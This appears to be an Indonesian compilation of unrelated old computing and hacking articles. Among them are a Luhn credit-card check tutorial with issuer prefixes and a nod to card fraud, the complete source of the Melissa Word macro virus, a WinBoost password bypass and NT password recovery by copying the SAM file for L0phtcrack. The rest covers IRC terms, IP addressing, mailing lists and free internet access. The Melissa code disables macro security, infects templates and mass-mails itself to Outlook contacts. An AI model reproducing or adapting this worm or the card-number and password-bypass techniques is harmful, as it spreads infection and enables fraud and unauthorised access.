1. untuk setiap digit pada posisi yang ganjil (saya menghitung digit mulai dari kiri dengan yang paling kiri adalah digit ke-1), kalikan nilainya dengan dua, jika hasilnya lebih dari 9, kurangi hasilnya dengan 9. Jumlahkan semua angka yang telah didapat itu.
2. untuk setiap digit pada posisi genap, jumlahkan semua nilainya dan tambahkan hasilnya dengan hasil langkah pertama.
3. jika hasil pada langkah kedua habis dibagi 10, berarti nomor kartu tersebut sah.

Mudah bukan?, untuk kartu dengan jumlah digit yang ganjil (misalnya Visa [13 digit], Amex [15 digit]) caranya sama, hanya saja pada langkah pertama yang dikalikan adalah digit pada posisi genap, dan pada langkah kedua yang dijumlahkan adalah digit pada posisi ganjil.

Algoritma Cek Digit Luhn

Contoh :
Jika saya punya kartu dengan nomor :

7889-8594-5435-5413

dan saya ingin tahu apakah angka ini benar-benar nomor kartu kredit yang sah atau tidak saya bisa melakukan langkah sbb (perhatikan jumlah digit ada 16):

1) mengalikan semua angka pada digit ganjil dengan dua dan mengurangkan hasilnya dengan 9 jika lebih dari 9, lalu dijumlahkan

inilah digit-digit pada posisi ganjil

D01 = 7
D03 = 8
D05 = 8
D07 = 9
D09 = 5
D11 = 3
D13 = 5
D15 = 1

Jika dilakukan operasi kali dua dan kurangi 9 (jika lebih dari 9) didapat

D01' = 7 x 2 = 14, karena lebih dari maka hasilnya dikurangi 9 D02' = 14 - 9 = 5
D03' = 8 x 2 = 16, karena lebih dari maka hasilnya dikurangi 9 D02' = 16 - 9 = 7
D05' = 8 x 2 = 16, karena lebih dari maka hasilnya dikurangi 9 D02' = 16 - 9 = 7
D07' = 9 x 2 = 18, karena lebih dari maka hasilnya dikurangi 9 D02' = 18 - 9 = 9
D09' = 5 x 2 = 10, karena lebih dari maka hasilnya dikurangi 9 D02' = 10 - 9 = 1
D11' = 3 x 2 = 6 , kurang dari 9 jadi tetap 6
D13' = 5 x 2 = 10, karena lebih dari maka hasilnya dikurangi 9 D02' = 10 - 9 = 1
D15' = 1 x 2 = 2 , kurang dari 9 jadi tetap 2

Jumlah D01' + D03' + D05' + D07' + D09' + D11' + D13' + D15' = 5 + 7 + 7 + 9 + 1 + 6 + 1 + 2 = 38

2) Menjumlahkan semua digit pada posisi genap

D02 = 8
D04 = 9
D06 = 5
D08 = 4
D10 = 4
D12 = 5
D14 = 4
D16 = 3

Jumlah = 8 + 9 + 5 + 4 + 4 + 5 + 4 + 3 = 42

Bila hasil langkah 1 dan langkah 2 dijumlahkan didapat 38 + 42 = 80, karena 80 habis dibagi 10 maka nomor tersebut sah sebagai nomor kartu kredit.

Sudah jelas kan?, ternyata algoritma cek digit pada kartu kredit sangat mudah dilakukan Anda pun bisa menghasilkan nomor-nomor yang sah sebagai nomor kartu kredit dengan menggunakan program, dan katanya dulu ini bisa dipakai untuk melakukan credit card fraud saya sendiri masih kurang mengerti dengan caranya karena menurut saya sekarang ini pemeriksaan sudah jauh lebih ketat dan hampir tidak mungkin seseorang lolos dengan hanya berbekal nomor yang sah saja tanpa expiration date dan nama pemiliknya.

Prefix Panjang nomor Jenis Kartu
1800 15 JCB
2131 15 JCB
300 14 Diners
301 14 Diners
302 14 Diners
303 14 Diners
304 14 Diners
305 14 Diners
34 15 Amex
36 14 Diners
37 15 Amex
38 14 Diners
3 16 JCB
4 13/16 Visa
51 16 MasterCard
52 16 MasterCard
53 16 MasterCard
54 16 MasterCard
55 16 MasterCard
56 16 Bankcard
6011 16 Discover

Beberapa istilah dalam chatting

Net splits
Network dapat menjadi terpecah (disebut "net split"), jadi memisahkan anda dari user-user yang sedang berbicara dengan anda. Split ini sering terjadi cukup singkat, walau kadang sampai beberapa hari.

Lag
Problem yang sering muncul adalah "lag", dimana ada delay yang terasa antara waktu ketika anda mengetikkan pesan dan sampai orang lain membacanya. Pilihlah server terdekat dengan kita untuk mengurangi lag. Lag dapat diukur dengan menggunakan perintah /ping (lihat bagian perintah-perintah di atas). Perintah untuk berpindah server adalah /server nama.server.tsb.

Server List
Pada banyak client, mengetikkan /links memberikan list dari server-server pada net yang bersangkutan. Gunakan perintah ini secara sparing, tidak lebih dari beberapa kali dalam satu baris.

Ping? Pong!
Untuk user mIRC : Ping? Pong! Dalam window status berarti server anda mem"ping" anda untuk memastikan bahwa anda masih terkoneksi, dan client anda otomatis membalas dengan pong. Tidak usah khawatir dengan hal ini.

Peringatan tentang DCC chat

Perintah /dcc chat dapat digunakan untuk membuka koneksi one-to-one yang menghindarkan dari lagi dan tidak akan diputuskan oleh net split. Periksalah dokumentasi client anda untuk petunjuk penggunaan. Pada client-client yang umum, anda dapat menset koneksi DCC chat dengan sekaligus mengetikkan /dcc chat nick_dari_orang_lain. Untuk berbicara melalui koneksi itu, ketik /msg =nick apa saja (perhatikan tanda =). Dalam mIRC, anda dapat juga memulai sesi DCC chat dengan memilih DCC dan kemudian Chat dari menu dan kemudian memasukkan nick dari user yang ingin kita ajak berbicara. Sebuah window akan terbuka untuk sesi dcc chat tersebut.

Virus Mellisa ( Source Code )

Private Sub AutoOpen() 
On Error Resume Next 
p$ = "clone" 
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then 
CommandBars("Macro").Controls("Security...").Enabled = False 
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& 
Else 
p$ = "clone" 
CommandBars("Tools").Controls("Macro").Enabled = False 
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) 
End If 
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice 
Set UngaDasOutlook = CreateObject("Outlook.Application") 
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") 
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then 
If UngaDasOutlook = "Outlook" Then 
DasMapiName.Logon "profile", "password" 
For y = 1 To DasMapiName.AddressLists.Count 
Set AddyBook = DasMapiName.AddressLists(y) 
x = 1 
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) 
For oo = 1 To AddyBook.AddressEntries.Count 
Peep = AddyBook.AddressEntries(x) 
BreakUmOffASlice.Recipients.Add Peep 
x = x + 1 
If x > 50 Then oo = AddyBook.AddressEntries.Count 
Next oo 
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName 
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" 
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName 
BreakUmOffASlice.Send 
Peep = "" 
Next y 
DasMapiName.Logoff 
End If 
p$ = "clone" 
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" 
End If 
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) 
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) 
NTCL = NTI1.CodeModule.CountOfLines 
ADCL = ADI1.CodeModule.CountOfLines 
BGN = 2 
If ADI1.Name <> "Melissa" Then 
If ADCL > 0 Then _ 
ADI1.CodeModule.DeleteLines 1, ADCL 
Set ToInfect = ADI1 
ADI1.Name = "Melissa" 
DoAD = True 
End If 
If NTI1.Name <> "Melissa" Then 
If NTCL > 0 Then _ 
NTI1.CodeModule.DeleteLines 1, NTCL 
Set ToInfect = NTI1 
NTI1.Name = "Melissa" 
DoNT = True 
End If 
If DoNT <> True And DoAD <> True Then GoTo CYA 
If DoNT = True Then 
Do While ADI1.CodeModule.Lines(1, 1) = "" 
ADI1.CodeModule.DeleteLines 1 
Loop 
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") 
Do While ADI1.CodeModule.Lines(BGN, 1) <> "" 
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) 
BGN = BGN + 1 
Loop 
End If 
p$ = "clone" 
If DoAD = True Then 
Do While NTI1.CodeModule.Lines(1, 1) = "" 
NTI1.CodeModule.DeleteLines 1 
Loop 
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") 
Do While NTI1.CodeModule.Lines(BGN, 1) <> "" 
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) 
BGN = BGN + 1 
Loop 
End If 
CYA: 
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then 
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName 
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then 
ActiveDocument.Saved = True: End If 
'WORD/Melissa written by Kwyjibo 
'Clone written by Duke/SMF 
'Works in both Word 2000 and Word 97 
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! 
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." 
End Sub

Menjebol WinBoost yang terproteksi

WinBoost 2000 (www.winboost.com) merupakan utility favorit bagi banyak orang, karena dapat digunakan untuk mengganti puluhan setting tersembunyi pada Windows 9x tanpa perlu susah payah otak-atik pada registry.
Program tersebut juga dilengkapi dengan fasilitas password, sehingga hanya orang yang tahu passwordnya saja yang dapat menggunakan. Tapi sayangnya proteksi tersebut sangat lemah dan mudah dibongkar. Pengen tahu caranya ?
Sekarang jalankan WinBoost Anda dan aktifkan password (terletak pada bagian WinBoost 2000 preferences). Terserah mau dikasih password apa. Kalau sudah segera tutup WinBoost-nya.
Mulai sekarang untuk menggunakan WinBoost Anda harus memasukkan Untuk 
"melumpuhkan" password WinBoost, hapus saja Name Password passwordnya. Nah, untuk mengakali "todongan" password tersebut, jalankan registry editor. Pindah ke key HKey_Local_Machine\Software\Magellas\WinBoost 2000. Lihat pada panel sebelah kanan. Kalau WinBoost Anda terproteksi dengan password maka akan terdapat Name bernama Password. Isi Data tersebut adalah passwordnya yang telah dienkrip. Coba hapus Name bertuliskan Password tersebut.
Sekarang jalankan lagi WinBoost-nya. Gimana hasilnya ? Ternyata Anda tidak ditodong password lagi khan ?

Konsep IP Address di Internet

Walaupun bagi para pengguna Internet umumnya kita hanya perlu mengenal hostname dari mesin yang dituju, seperti: server.indo.net.id, rad.net.id, ui.ac.id, itb.ac.id. Bagi komputer untuk bekerja langsung menggunakan informasi tersebut akan relatif lebih sulit karena tidak ada keteraturan yang dapat di programkan dengan mudah. Untuk mengatasi hal tersebut, komputer mengidentifikasi alamat setiap komputer menggunakan sekumpulan angka sebanyak 32 bit yang dikenal sebagai IP address.
Adanya IP Address merupakan konsekuensi dari penerapan Internet Protocol untuk mengintegrasikan jaringan komputer Internet di dunia. Seluruh host (komputer) yang terhubung ke Internet dan ingin berkomunikasi memakai TCP/IP harus memiliki IP Address sebagai alat pengenal host pada network. Secara logika, Internet merupakan suatu network besar yang terdiri dari berbagai sub network yang terintegrasi. Oleh karena itu, suatu IP Address harus bersifat unik untuk seluruh dunia. Tidak boleh ada satu IP Address yang sama dipakai oleh dua host yang berbeda. Untuk itu, penggunaan IP Address di seluruh dunia dikoordinasi oleh lembaga sentral Internet yang di kenal dengan IANA - salah satunya adalah Network Information Center (NIC) yang menjadi koordinator utama di dunia untuk urusan alokasi IP Address ini adalah :
InterNIC Registration Services Network Solution Incorporated 505 Huntmar Park Drive, Herndon, Virginia 22070 Tel: [800] 444-4345, [703] 742-4777 FAX: [703] 742-4811 E-mail: hostmaster@internic.net
Sedangkan untuk tingkat Asia Pasifik saat ini masih dikoordinasi oleh:
Asia Pacific Network Information Center c/o Internet Initiative Japan, Inc. Sanbancho Annex Bldg., 1-4, Sanban-cho, Chiyoda-ku, Tokyo, 102 Japan Tel: +81-3-5276-3973 FAX: +81-3-5276-6239 E-mail: domreg@apnic.net http://www.apnic.net
Struktur IP Address
IP Address terdiri dari bilangan biner sepanjang 32 bit yang dibagi atas 4 segmen. Tiap segmen terdiri atas 8 bit yang berarti memiliki nilai desimal dari 0 - 255. Range address yang bisa digunakan adalah dari 00000000.00000000.00000000.00000000 sampai dengan 11111111.11111111.11111111.11111111. Jadi, ada sebanyak 232 kombinasi address yang bisa dipakai diseluruh dunia (walaupun pada kenyataannya ada sejumlah IP Address yang digunakan untuk keperluan khusus). Jadi, jaringan TCP/IP dengan 32 bit address ini mampu menampung sebanyak 232 atau lebih dari 4 milyar host. Untuk memudahkan pembacaan dan penulisan, IP Address biasanya direpresentasikan dalam bilangan desimal. Jadi, range address di atas dapat diubah menjadi address 0.0.0.0 sampai address 255.255.255.255. Nilai desimal dari IP Address inilah yang dikenal dalam pemakaian sehari-hari. Beberapa contoh IP Address adalah :
44.132.1.20
167.205.9.35
202.152.1.250 


Ilustrasi IP Addres dalam desimal dan biner dapat dilihat pada gambar 1 berikut :

Gambar 1. IP Address dalam Bilangan Desimal dan Biner
IP Address dapat dipisahkan menjadi 2 bagian, yakni bagian network (bit-bit network/network bit) dan bagian host (bit-bit host/host bit). Bit network berperan dalam identifikasi suatu network dari network yang lain, sedangkan bit host berperan dalam identifikasi host dalam suatu network. Jadi, seluruh host yang tersambung dalam jaringan yang sama memiliki bit network yang sama. Sebagian dari bit-bit bagian awal dari IP Address merupakan network bit/network number, sedangkan sisanya untuk host. Garis pemisah antara bagian network dan host tidak tetap, bergantung kepada kelas network. Ada 3 kelas address yang utama dalam TCP/IP, yakni kelas A, kelas B dan kelas C. Perangkat lunak Internet Protocol menentukan pembagian jenis kelas ini dengan menguji beberapa bit pertama dari IP Address. Penentuan kelas ini dilakukan dengan cara berikut : ·
  • Jika bit pertama dari IP Address adalah 0, address merupakan network kelas A. Bit ini dan 7 bit berikutnya (8 bit pertama) merupakan bit network sedangkan 24 bit terakhir merupakan bit host. Dengan demikian hanya ada 128 network kelas A, yakni dari nomor 0.xxx.xxx.xxx sampai 127.xxx.xxx.xxx, tetapi setiap network dapat menampung lebih dari 16 juta (2563) host (xxx adalah variabel, nilainya dari 0 s/d 255). Ilustrasinya dapat dilihat pada gambar 2 berikut.


    Gambar 2. Struktur IP Address Kelas A

     
  • · Jika 2 bit pertama dari IP Address adalah 10, address merupakan network kelas B. Dua bit ini dan 14 bit berikutnya (16 bit pertama) merupakan bit network sedangkan 16 bit terakhir merupakan bit host. Dengan demikian terdapat lebih dari 16 ribu network kelas B (64 x 256), yakni dari network 128.0.xxx.xxx - 191.255.xxx.xxx. Setiap network kelas B mampu menampung lebih dari 65 ribu host (2562). Ilustrasinya dapat dilihat pada gambar 3 berikut.

    Gambar 3. Struktur IP Address Kelas B
     
  • Jika 3 bit pertama dari IP Address adalah 110, address merupakan network kelas C. Tiga bit ini dan 21 bit berikutnya (24 bit pertama) merupakan bit network sedangkan 8 bit terakhir merupakan bit host. Dengan demikian terdapat lebih dari 2 juta network kelas C (32 x 256 x 256), yakni dari nomor 192.0.0.xxx sampai 223.255.255.xxx. Setiap network kelas C hanya mampu menampung sekitar 256 host. Ilustrasinya dapat dilihat pada gambar 4.


    Gambar 4. Struktur IP Address Kelas C
  •  
  • Selain ke tiga kelas di atas, ada 2 kelas lagi yang ditujukan untuk pemakaian khusus, yakni kelas D dan kelas E. Jika 4 bit pertama adalah 1110, IP Address merupakan kelas D yang digunakan untuk multicast address, yakni sejumlah komputer yang memakai bersama suatu aplikasi (bedakan dengan pengertian network address yang mengacu kepada sejumlah komputer yang memakai bersama suatu network). Salah satu penggunaan multicast address yang sedang berkembang saat ini di Internet adalah untuk aplikasi real-time video conference yang melibatkan lebih dari dua host (multipoint), menggunakan Multicast Backbone (MBone). Kelas terakhir adalah kelas E (4 bit pertama adalah 1111 atau sisa dari seluruh kelas). Pemakaiannya dicadangkan untuk kegiatan eksperimental. Jenis kelas address yang diberikan oleh kooordinator IP Address bergantung kepada kebutuhan instansi yang meminta, yakni jumlah host yang akan diintegrasikan dalam network dan rencana pengembangan untuk beberapa tahun mendatang. Untuk perusahaan, kantor pemerintah atau universitas besar yang memiliki puluhan ribu komputer dan sangat berpotensi untuk tumbuh menjadi jutaan komputer, koordinator IP Address akan mempertimbangkan untuk memberikan kelas A. Contoh IP Address kelas A yang dipakai di Internet adalah untuk amatir paket radio seluruh dunia, mendapat IP nomor 44.xxx.xxx.xxx. Untuk kelas B, contohnya adalah nomor 167.205.xxx.xxx yang dialokasikan untuk ITB dan jaringan yang terkait ke ITB dibawah koordinator Onno W. Purbo.
    Address Khusus
    Selain address yang dipergunakan untuk pengenal host, ada beberapa jenis address yang digunakan untuk keperluan khusus dan tidak boleh digunakan untuk pengenal host. Address tersebut adalah :
  • Network Address.
    Address ini digunakan untuk mengenali suatu network pada jaringan Internet. Misalkan untuk host dengan IP Address kelas B 167.205.9.35. Tanpa memakai subnet, network address dari host ini adalah 167.205.0.0. Address ini didapat dengan membuat seluruh bit host pada 2 segmen terakhir menjadi 0. Tujuannya adalah untuk menyederhanakan informasi routing pada Internet. Router cukup melihat network address (167.205) untuk menentukan kemana paket tersebut harus dikirimkan. Contoh untuk kelas C, network address untuk IP address 202.152.1.250 adalah 202.152.1.0. Analogi yang baik untuk menjelaskan fungsi network address ini adalah dalam pengolahan surat pada kantor pos. Petugas penyortir surat pada kantor pos cukup melihat kota tujuan pada alamat surat (tidak perlu membaca seluruh alamat) untuk menentukan jalur mana yang harus ditempuh surat tersebut. Pekerjaan "routing" surat-surat menjadi lebih cepat. Demikian juga halnya dengan router di Internet pada saat melakukan routing atas paket-paket data.
  • Broadcast Address.
    Address ini digunakan untuk mengirim/menerima informasi yang harus diketahui oleh seluruh host yang ada pada suatu network. Seperti diketahui, setiap paket IP memiliki header alamat tujuan berupa IP Address dari host yang akan dituju oleh paket tersebut. Dengan adanya alamat ini, maka hanya host tujuan saja yang memproses paket tersebut, sedangkan host lain akan mengabaikannya. Bagaimana jika suatu host ingin mengirim paket kepada seluruh host yang ada pada networknya ? Tidak efisien jika ia harus membuat replikasi paket sebanyak jumlah host tujuan. Pemakaian bandwidth akan meningkat dan beban kerja host pengirim bertambah, padahal isi paket-paket tersebut sama. Oleh karena itu, dibuat konsep broadcast address. Host cukup mengirim ke alamat broadcast, maka seluruh host yang ada pada network akan menerima paket tersebut. Konsekuensinya, seluruh host pada network yang sama harus memiliki address broadcast yang sama dan address tersebut tidak boleh digunakan sebagai IP Address untuk host tertentu. Jadi, sebenarnya setiap host memiliki 2 address untuk menerima paket : pertama adalah IP Addressnya yang bersifat unik dan kedua adalah broadcast address pada network tempat host tersebut berada. Address broadcast diperoleh dengan membuat seluruh bit host pada IP Address menjadi 1. Jadi, untuk host dengan IP address 167.205.9.35 atau 167.205.240.2, broadcast addressnya adalah 167.205.255.255 (2 segmen terakhir dari IP Address tersebut dibuat berharga 11111111.11111111, sehingga secara desimal terbaca 255.255). Jenis informasi yang dibroadcast biasanya adalah informasi routing.
  • Netmask.
    Adalah address yang digunakan untuk melakukan masking / filter pada proses pembentukan routing supaya kita cukup memperhatikan beberapa bit saja dari total 32 bit IP Address. Artinya dengan menggunakan netmask tidak perlu kita memperhatikan seluruh (32 bit) IP address untuk menentukan routing, akan tetapi cukup beberapa buah saja dari IP address yg kita perlu perhatikan untuk menentukan kemana packet tersebut dikirim.  
Kaitan antara host address, network address, broadcast address & network mask sangat erat sekali - semua dapat dihitung dengan mudah jika kita cukup paham mengenai bilangan Biner. Jika kita ingin secara serius mengoperasikan sebuah jaringan komputer menggunakan teknologi TCP/IP & Internet, adalah mutlak bagi kita untuk menguasai konsep IP address tersebut. Konsep IP address sangat penting artinya bagi routing jaringan Internet. Kemampuan untuk membagi jaringan dalam subnet IP address penting artinya untuk memperoleh routing yang sangat effisien & tidak membebani router-router yang ada di Internet. Mudah-mudahan tulisan awal ini dapat membuka sedikit tentang teknologi / konsep yang ada di dalam Internet.


  •  

Mengembalikan password pada Windows NT

Lupa memang kodratnya manusia. Tapi kalau lupa dengan password Win NT Anda tentu urusannya bisa repot. Di bawah ini diuraikan cara mengembalikan pasword yang terlupa pada Windows NT.
Metode 1 (menggunakan L0phtcrack)
Booting komputer dengan sistem yang minimal dapat memungkinkan Anda melakukan Read access pada partisi NT Anda. Hal ini dimungkinkan dengan menggunakan NTFS dos. Masuklah ke %systemroot%\system32 dan kemudian duplikasi SAM file ke disket. Setelah Anda memiliki SAM file, Anda dapat menggunakan L0phtcrack untuk meng-extract username dan password darinya.
Metode 2
Jika komputer tersebut adalah anggota dari suatu Domain Anda dapat menggunakan NT4's usermanager untuk koneksi ke komputer yang terkunci (lockout) dan mengubah local Admin's password. Untuk melakukan hal ini, anda harus merupakan suatu Domain Admin pada domain tersebut, kemudian gunakan User Manager, koneksi ke komputer dengan menggunakan UNC-nya (\\computername) kemudian double klik pada account administrator dan ubah passwordnya.
Sumber :
Password recovery in NT, http://black.box.sk/

Diskusi Melalui Mailing List di Internet

Abstrak

Tulisan ini akan membahas alternatif media / sarana komunikasi yang banyak digunakan di Internet untuk bertukar informasi / pikiran. Mailing list merupakan bentuk dasar dari diskusi secara elektronik yang berbasis elektronik mail. Aplikasi mailing list dibentuk jauh sebelum Web menjadi populer & memenuhi traffic Internet seperti saat ini. Akan tetapi mailing list merupakan sarana yang sangat ampuh - bahkan menurut pengalamanan penulis lebih ampuh dari pada Web yang sifatnya lebih pasif.

Pendahuluan
Pada dasarnya mailing list bekerja dengan konsep yang sangat sederhana, seorang pengguna cukup mengirimkan E-mail ke satu alamat E-mail untuk kemudian di sebarkan ke semua member mailing list yang tergabung / berlangganan ke alamat E-mail tersebut. Bayangkan bagi seorang yang sedang kesulitan masalah komputer kemudian mengirimkan pertanyaan melalui E-mail ke mailing list tempat berkumpul para hackers, dapat diharapkan bahwa kemungkinan satu-dua orang hackers mengetahui jawaban dari permasalahan yang dihadapi. Akhirnya dengan segera solusi dari masalah yang dihadapi dapat dipecahkan dalam waktu yang singkat (mungkin diperlukan beberapa jam). Mailing list beroperasi 24 jam tanpa henti sepanjang tahun, mari kita banyangkan bersama apa yang terjadi jika kita melakukan diskusi secara terus menerus tanpa henti :

  • Jika seseorang secara terus menerus secara serius dalam selang waktu yang lama (beberapa bulan bahkan tahun) - dapat diharapkan orang tersebut akan menjadi "ahli" dalam bidang yang didiskusikan tersebut. Artinya mailing list merupakan sebuah media effektif untuk proses pendidikan.
  • Proses marketing / public relation sebuah perusahaan / product pada dasarnya merupakan sebuah proses pendidikan dari customer / user / client. Berbeda barangkali dengan konsep-konsep PR yang umumnya ada saat ini yang lebih banyak bergantung pada media non-interaktif dengan sedikit seminar / workshop. Dengan adanya mailing list proses marketing & PR dapat dilakukan secara interaktif & terus-menerus tanpa henti selama 24 jam sepanjang tahun. Dapat dibayangkan bahwa dengan konsistensi PR seperti itu dapat diharapkan image & eksistensi perusahaan akan menjadi lebih kuat dimata client-nya. Tentunya nanti bagian PR usaha / product tsb. harus secara selektif memilih untuk aktif di mailing list tertentu yang sesuai dengan product yg dipasarkan.
Jelas disini bahwa mailing list merupakan media yang lebih bersifat interaktif & pro-aktif di bandingkan dengan Web yang biasa ada di Internet. Sifat ini menjadi kunci utama untuk memperkuat image & eksistensi seseorang / perusahaan di Internet secara keseluruhan. Konsekuensi yang harus di tempuh oleh orang / perusahaan yang akan menggunakan mailing list adalah harus dapat berinteraksi / meresponds secara cepat menggunakan E-mail, karena semua pengguna E-mail di Internet berharap agar responds dapat dilakukan secara cepat. Untuk itu dibutuhkan orang / staff yang ulet & konsisten untuk menjawab berbagai pertanyaan yang dapat - tidak jarang di berbagai aktifitas Internet - justru CEO / CIO yang akan turun langsung menjawab berbagai pertanyaan tersebut.

Beberapa Teknik Dasar Mailing List
Pada dasarnya ada dua jenis server mailing list, yaitu:
  • majordomo
  • listserv
Jenis ini dapat dikenali dengan mengirimkan mail ke server yang dimaksud dengan alamat majordomo@server atau listserv@server, contoh:
majordomo@itb.ac.id
Di ITB kami menggunakan majordomo di UNIX yang memang lebih sederhana daripada listserv. Instalasi dilakukan oleh Arman dan Adnan Basalamah. Dengan majordomo tersebut, ITB pada saat merupakan host mailing list terbesar di Indonesia dengan diskusi yang meliputi beberapa kuliah di ITB, alumni ITB, berbagai teknik hingga kedokteran, ekonomi & pasar modal - pada saat tulisan ini ditulis jumlah diskusi yang ada di ITB telah melebihi 90 buah mailing list.
Majordomo & listserv merupakan server dari mailing list yang mengatur kerja mailing list terutama untuk berlangganan secara otomatis, pengambilan file dll. Daftar lengkap berbagai command dari majordomo & listserv terlampir pada tabel di bawah. Secara umum proses yang sering / akan terjadi adalah:
  • Seorang pengguna Internet akan mengirimkan E-mail ke majordomo@host_server. Misalnya: majordomo@itb.ac.id untuk berbagai operasi mailing list.
  • Untuk melihat daftar mailing list dengan cara, mengirim mail ke majordomo@itb.ac.id (misalnya) dengan isi berita : lists
  • Setelah daftar mailing list yang ada di server yang dimaksud (itb.ac.id) di peroleh, maka untuk berlangganan mailing list tertentu (misalnya pau-miko) kita cukup mengirimkan perintah: subscribe pau-mikro
  • Untuk melepaskan langganan, dapat dilakukan dengan mudah dengan perintah: unsubscribe
Tentunya masih banyak fasilitas lain yang diberikan oleh majordomo & listserv, terutama untuk memudahkan pengguna mengambil informasi tentang berbagai hal yang berkaitan dengan mailing list tertentu secara elektronik. Misalnya berbagai file dapat disimpan di server untuk kemudian diambil menggunakan perintah "get". 


Daftar Perintah Majordomo
Perintah
Keterangan
subscribe [
]
Subscribe anda (atau
yang diberikan) ke yang di inginkan.
unsubscribe [
]
Unsubscribe anda (atau
yang diberikan) ke yang di inginkan.
get Ambil file yang berhubungan dengan
index Ambil index dari file yang dapat di "get" dari
which [
]
Mencari tahu list mana saja anda (atau
jika diberitahukan) terdaftar.
who Mencari tahu siapa saja yang terdaftar pada
info Ambil informasi tentang
Lists Melihat list yang ada di Majordomo server
help HELP
end Stop processing commands
Daftar Command Listserv
Perintah
Keterangan
HELP HELP
HELP listname Informasi tentang
INDEX Daftar semua mailing list yang dapat di langgan.
LONGINDEX Seperti INDEX + deskripsi masing-masing.
ADD listname Sama dengan SUBSCRIBE listname
DELETE listname Sama dengan UNSUBSCRIBE listname
ADD address listname Sama dengan ADD di atas dengan [
] spesifik
DELETE address listname Sama dengan DELETE di atas dengan [
] spesifik
DELETE-ALL UNSUBSCRIBE-ALL dari semua mailing list.
DELETE-ALL address UNSUBSCRIBE-ALL untuk [
tertentu.
LIST Melihat mailing list mana saja kita terdaftar.
LIST address Melihat mailing list mana saja [
] terdaftar.
FAQ Daftar Frequently Asked Questions (FAQ) yang ada.
FAQ listname FAQ dari tertentu.

Internet Gratis

Barangkali susah di percaya - sesuatu yang hi-tech seperti Internet bisa diberikan percuma. Tapi kalau kita jeli dan memperhatikan sekeliling kita sebetulnya ada banyak hal yang kita bisa peroleh secara gratisan. Perhatikan televisi siaran swasta, radio siaran, beberapa majalah profesional pun dibagikan gratis, kadang-kadang pager, kadang-kadang handphone, kadang-kadang koran, flyer dari berbagai supermarket banyak sekali media yang dapat kita peroleh secara gratis.
Internet gratis juga bukan sesuatu yang mustahil. Coba perhatikan - sekarang banyak akses e-mail berbasis Web yang diberikan secara gratis, contoh yang sering digunakan seperti hotmail.com, yahoo.com, usa.net, qsl.net dan masih banyak lagi orang yang memberikan servis e-mail gratis. Web juga tidak kalah serunya ada banyak tempat meletakkan web gratisan - seperti geocities.com.
Baiklah mungkin kita di Indonesia biasa dengan e-mail dan Web gratis, bagaimana dengan ISP atau akses ke Internet - sekarang semua harus membayar ke ISP atau menggunakan telkomnet instan. Mungkinkah akses ke ISP jadi gratis? Kalau di dunia sekarang - di Inggris sudah ada akses Internet gratis, FreeNet di Amerika Serikat telah memberikan akses Internet secara gratis sejak tahun 80-an, di Singapore juga tampaknya telah terbentuk ISP yang bisa memberikan akses gratisan.
Kita bisa saja berargumentasi - lha itu kan negara maju. Di Indonesia kalau kita perhatikan ada sesuatu juga yang bisa kita peroleh gratis dari akses Internet. Contoh nyata di Indonesia - sekarang ada Warung Internet yang memberikan soft-drink gratis bagi pengunjungnya … ini awal yang lumayan lah. Artinya bukan mustahil Internet semakin hari semakin murah.
Bagaimana ini semua bisa terjadi? Internet dari sisi informasi-nya tidak berbeda terlalu jauh dengan bisnis media sebetulnya - apakah itu media televisi, media radio, koran / surat kabar. RCTI, ANTV, SCTV, IndoSiar, KOMPAS, Republika, Rase FM, OZ FM semua media sebagian besar hidup-nya dari iklan & bukan dari biaya yang ambil pembaca / pendengar / pemirsa-nya. Semakin banyak pendengar / pembaca-nya dari golongan tertentu - maka semakin mungkin untuk memperoleh iklan yang di arahkan ke golongan pembaca / pemirsa tertentu tersebut.
Hal yang sama terjadi di Internet juga rupanya, semakin banyak orang berkumpul di suatu tempat virtual di Internet semakin mahal tempat tersebut sebagai ajang iklan. Perhatikan hotmail.com, yahoo.com - praktis semua tempat yang banyak di kunjungi orang menjadi tempat paling banyak di pasangi iklan-iklan. Kita bicara disini dalam orde juta-an manusia yang mengakses hotmail.com / yahoo.com. Bagaimana dengan Indonesia tampaknya sekarang yang menikmati pemasukan iklan dalam jumlah besar tidak banyak - minimal kompas.com & detik.com masing-masing berkisar antara seratusan juta / bulan hingga puluhan juta / bulan - semua dari iklan - yah lumayan buat balik modal.
Jadi strategi-nya adalah bagaimana caranya mengumpulkan sebanyak mungkin orang, sukur-sukur kita bisa tahu bagaimana profile orang yang berkumpul itu - nah massa yang berkumpul ini urusannya bisa menghasilkan duit atau bisa juga di arahkan ke kepentingan-kepentingan lain (bisa ekonomi maupun politik) untuk media yang mengumpulkan massa tersebut. Tinggal pandai-pandainya media yang mengumpulkan massa tersebut untuk menjual massa-nya ke penyandang dana yang akan diuntungkan oleh kumpulan massa tersebut.

